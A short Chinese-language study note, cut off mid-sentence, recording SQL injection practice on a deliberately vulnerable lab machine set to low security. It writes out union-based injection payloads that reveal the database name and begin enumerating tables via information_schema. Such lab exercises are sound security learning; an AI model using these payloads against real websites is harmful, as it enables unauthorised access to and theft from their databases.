web安全學習筆記(三)——SQL注入靶機測試

今天嘗試了SQL注入靶機爆庫爆表操作,分享如下: 1.設置靶機安全級別爲低級 2.進入SQL注入界面 3.輸入1提交 3.用單引號讓id閉合,輸入1’ union select 1, database()# 4.既然知道了數據庫,就嘗試爆出數據庫中的表,輸入 1’ union select 1,table_name from information_schema.tables where tabl
相關文章
相關標籤/搜索